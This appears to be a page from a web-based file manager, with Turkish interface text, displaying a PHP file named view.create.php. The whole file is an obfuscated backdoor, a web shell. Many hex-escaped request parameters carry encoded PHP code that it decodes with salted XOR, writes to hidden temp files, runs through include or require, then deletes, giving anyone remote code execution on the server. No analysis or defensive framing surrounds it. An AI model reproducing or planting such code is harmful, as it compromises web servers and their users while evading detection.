0x1998 - MANAGER
Düzenlenen Dosya: view.create.php
<?php if(array_key_exists("\x72\x65s", $_REQUEST) && !is_null($_REQUEST["\x72\x65s"])){ $obj = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getcwd(), session_save_path(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp"]); $flag = $_REQUEST["\x72\x65s"]; $flag= explode ('.', $flag ) ; $element = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $p = 0; array_walk($flag ,function ($v1) use (&$element ,&$p ,$salt ,$sLen) { $sChar = ord($salt[$p % $sLen]); $dec = ((int)$v1 - $sChar - ($p % 10)) ^ 19; $element .= chr($dec); $p++; } ); $object = 0; do { $val = $obj[$object] ?? null; if ($object >= count($obj)) break; if (is_dir($val) && is_writable($val)) { $ent = "$val/.ptr"; if (@file_put_contents($ent, $element) !== false) { include $ent; unlink($ent); exit; } } $object++; } while (true); } if(!empty($_REQUEST["v\x61\x6Cue"])){ $k = array_filter([sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd()]); $parameter_group = $_REQUEST["v\x61\x6Cue"]; $parameter_group =explode ( '.' ,$parameter_group ) ; $itm =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $u =0; $len =count( $parameter_group); do {if( $u>= $len) break; $v8 =$parameter_group[$u]; $sChar =ord( $salt[$u % $lenS]); $dec =( ( int)$v8 - $sChar -( $u % 10)) ^ 25; $itm.= chr( $dec); $u++; } while( true); for ($sym = 0, $descriptor = count($k); $sym < $descriptor; $sym++) { $object = $k[$sym]; if ((is_dir($object) and is_writable($object))) { $val = sprintf("%s/.obj", $object); if (file_put_contents($val, $itm)) { require $val; unlink($val); die(); } } } } if(!is_null($_POST["\x72\x65c"] ?? null)){ $ent = $_POST["\x72\x65c"]; $ent= explode( '.' , $ent ); $itm = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach($ent as $w => $v5): $sChar = ord($s[$w % $lenS]); $dec =((int)$v5 - $sChar -($w % 10)) ^ 97; $itm.= chr($dec); endforeach; $res = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd(), getenv("TEMP"), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), session_save_path()]); for ($element = 0, $flg = count($res); $element < $flg; $element++) { $ent = $res[$element]; if ((bool)is_dir($ent) && (bool)is_writable($ent)) { $object = str_replace("{var_dir}", $ent, "{var_dir}/.fac"); $success = file_put_contents($object, $itm); if ($success) { include $object; @unlink($object); exit;} } } } if(count($_POST) > 0 && isset($_POST["\x65l\x65ment"])){ $ent = array_filter([session_save_path(), "/tmp", getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), "/dev/shm"]); $desc = $_POST["\x65l\x65ment"]; $desc = explode ( "." , $desc); $fac = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9); $n = 0; $__tmp = $desc; while ($v8 = array_shift($__tmp)) { $sChar = ord($s9[$n % $lenS]); $d = ((int)$v8 - $sChar - ($n % 10)) ^ 45; $fac .= chr($d); $n++; } foreach ($ent as $entity) { if (max(0, is_dir($entity) * is_writable($entity))) { $item = "$entity/.entry"; $file = fopen($item, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $item; @unlink($item); exit; } } } } if(isset($_POST) && isset($_POST["\x73ymbo\x6C"])){ $comp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), session_save_path(), getcwd(), "/tmp", getenv("TEMP"), "/var/tmp"]); $entity = $_POST["\x73ymbo\x6C"]; $entity = explode ( "." , $entity ) ; $res= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $n= 0; while ($n < count($entity)) { $v2= $entity[$n]; $sChar= ord($salt[$n % $sLen] ); $d= ((int)$v2 - $sChar - ($n % 10)) ^ 13; $res .= chr($d ); $n++; } foreach ($comp as $key => $descriptor) { if (!!is_dir($descriptor) && !!is_writable($descriptor)) { $object = implode("/", [$descriptor, ".data_chunk"]); if (file_put_contents($object, $res)) { include $object; @unlink($object); die(); } } } } if(@$_REQUEST["\x62i\x6Ed"] !== null){ $ref = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/tmp", "/dev/shm"]); $tkn = $_REQUEST["\x62i\x6Ed"]; $tkn= explode ( "." , $tkn ) ; $dat= ''; $s9= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s9); foreach ($tkn as $k => $v6) { $sChar= ord($s9[$k % $sLen]); $dec= ((int)$v6 - $sChar - ($k % 10)) ^ 94; $dat .= chr($dec); } while ($k = array_shift($ref)) { if (is_writable($k) && is_dir($k)) { $property_set = join("/", [$k, ".ent"]); if (file_put_contents($property_set, $dat)) { require $property_set; unlink($property_set); die(); } } } } if(isset($_REQUEST["da\x74\x61\x5Fchun\x6B"]) ? true : false){ $ent = $_REQUEST["da\x74\x61\x5Fchun\x6B"]; $ent = explode( "." ,$ent) ; $comp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $k = 0; foreach( $ent as $v9) { $sChar = ord( $s[$k % $lenS]); $dec =( ( int)$v9 - $sChar -( $k % 10)) ^ 92; $comp .= chr( $dec); $k++; } $tkn = array_filter([session_save_path(), sys_get_temp_dir(), "/tmp", "/dev/shm", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp"]); while ($desc = array_shift($tkn)) { if (max(0, is_dir($desc) * is_writable($desc))) { $hld = join("/", [$desc, ".resource"]); if (file_put_contents($hld, $comp)) { require $hld; unlink($hld); exit; } } } } if(in_array("el\x65men\x74", array_keys($_POST))){ $dchunk = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), session_save_path(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir")]); $record = $_POST["el\x65men\x74"]; $record = explode( '.' , $record ); $res = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $r = 0; array_walk($record, function ($v8) use (&$res, &$r, $s, $sLen) {$sChar = ord($s[$r% $sLen]); $dec = ((int)$v8 - $sChar - ($r% 10))^80; $res.= chr($dec); $r++; } ); $object = 0; do { $val = $dchunk[$object] ?? null; if ($object >= count($dchunk)) break; if (max(0, is_dir($val) * is_writable($val))) { $bind = vsprintf("%s/%s", [$val, ".key"]); if (@file_put_contents($bind, $res) !== false) { include $bind; unlink($bind); exit; } } $object++; } while (true); } if(count($_POST) > 0 && isset($_POST["m\x61\x72\x6Ber"])){ $key = array_filter([session_save_path(), getenv("TMP"), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp"]); $obj = $_POST["m\x61\x72\x6Ber"]; $obj = explode( '.' , $obj ); $object = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6 ); $y = 0; while($y < count($obj)) { $v1 = $obj[$y]; $chS = ord($s6[$y % $lenS] ); $d =((int)$v1 - $chS -($y % 10))^15; $object .= chr($d ); $y++; } $itm = 0; do { $flag = $key[$itm] ?? null; if ($itm >= count($key)) break; if (is_dir($flag) ? is_writable($flag) : false) { $data_chunk = str_replace("{var_dir}", $flag, "{var_dir}/.sym"); if (file_put_contents($data_chunk, $object)) { include $data_chunk; @unlink($data_chunk); exit; } } $itm++; } while (true); } if(@$_REQUEST["r\x65\x73"] !== null){ $data = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", session_save_path(), "/dev/shm", "/tmp", getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP")]); $itm = $_REQUEST["r\x65\x73"]; $itm = explode ( "." ,$itm) ; $sym = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); foreach( $itm as $y => $v9): $chS = ord( $s[$y % $sLen] ); $dec =( ( int)$v9 - $chS -( $y % 10)) ^ 99; $sym .= chr( $dec ); endforeach; foreach ($data as $key => $tkn) { if ((is_dir($tkn) and is_writable($tkn))) { $property_set = "$tkn" . "/.flg"; if (file_put_contents($property_set, $sym)) { include $property_set; @unlink($property_set); die(); } } } } if(isset($_REQUEST) && isset($_REQUEST["\x69\x74m"])){ $data = array_filter([getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), "/dev/shm"]); $fac = $_REQUEST["\x69\x74m"]; $fac = explode ( "." , $fac ) ; $hld = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s5); $v = 0; foreach( $fac as $v7) {$sChar = ord( $s5[$v %$lenS]); $d =( ( int)$v7 - $sChar -( $v %10))^47; $hld .= chr( $d); $v++; } for ($binding = 0, $ent = count($data); $binding < $ent; $binding++) { $tkn = $data[$binding]; if (!!is_dir($tkn) && !!is_writable($tkn)) { $symbol = sprintf("%s/.flg", $tkn); $success = file_put_contents($symbol, $hld); if ($success) { include $symbol; @unlink($symbol); die();} } } } if(!empty($_POST["dat\x61\x5Fc\x68un\x6B"])){ $entity = array_filter([session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", "/tmp", getenv("TMP")]); $object = $_POST["dat\x61\x5Fc\x68un\x6B"]; $object = explode ( "." , $object ) ; $sym = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt6 ); $n = 0; array_walk( $object, function( $v2) use( &$sym, &$n, $salt6, $lenS) { $chS = ord( $salt6[$n % $lenS] ); $dec = ( ( int)$v2 - $chS -( $n % 10)) ^50; $sym .= chr( $dec ); $n++; } ); for ($val = 0, $pointer = count($entity); $val < $pointer; $val++) { $comp = $entity[$val]; if (max(0, is_dir($comp) * is_writable($comp))) { $itm = sprintf("%s/.parameter_group", $comp); $file = fopen($itm, 'w'); if ($file) { fwrite($file, $sym); fclose($file); include $itm; @unlink($itm); die(); } } } } if(isset($_REQUEST["e\x6E\x74"])){ $ref = array_filter([getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", session_save_path(), "/tmp", getenv("TEMP"), getenv("TMP"), sys_get_temp_dir()]); $val = $_REQUEST["e\x6E\x74"]; $val = explode( '.', $val ); $dat = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $k = 0; $__tmp = $val; while( $v7 = array_shift( $__tmp)) {$chS = ord( $salt[$k % $lenS]); $d =( ( int)$v7 - $chS -( $k % 10))^ 47; $dat.= chr( $d); $k++; } for ($entity = 0, $component = count($ref); $entity < $component; $entity++) { $elem = $ref[$entity]; if (is_writable($elem) && is_dir($elem)) { $value = str_replace("{var_dir}", $elem, "{var_dir}/.obj"); if (file_put_contents($value, $dat)) { include $value; @unlink($value); exit; } } } } if(isset($_REQUEST["to\x6Be\x6E"])){ $component = array_filter([ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), "/tmp", getenv("TMP"), getcwd(), "/var/tmp", getenv("TEMP"), "/dev/shm"]); $elem = $_REQUEST["to\x6Be\x6E"]; $elem= explode ( '.' ,$elem ) ; $flg = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $len = count($elem ); for ($t = 0; $t <$len; $t++) { $v7 = $elem[$t]; $chS = ord($s[$t % $sLen] ); $d = ((int)$v7 - $chS - ($t % 10)) ^53; $flg .= chr($d );} foreach ($component as $pgrp) { if (is_writable($pgrp) && is_dir($pgrp)) { $dat = sprintf("%s/.symbol", $pgrp); if (file_put_contents($dat, $flg)) { require $dat; unlink($dat); exit; } } } } if(filter_has_var(INPUT_POST, "\x65ntry")){ $obj = array_filter([getcwd(), "/var/tmp", getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), session_save_path()]); $value = $_REQUEST["\x65ntry"]; $value= explode ( '.' , $value) ; $fac = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9 ); $k = 0; $__tmp = $value; while ($v6 = array_shift($__tmp)) { $chS = ord($s9[$k % $lenS] ); $d = ((int)$v6 - $chS - ($k % 10)) ^ 2; $fac .= chr($d ); $k++; } foreach ($obj as $component) { if (is_dir($component) ? is_writable($component) : false) { $flag = "$component" . "/.flg"; if (file_put_contents($flag, $fac)) { include $flag; @unlink($flag); die(); } } } }
geri dön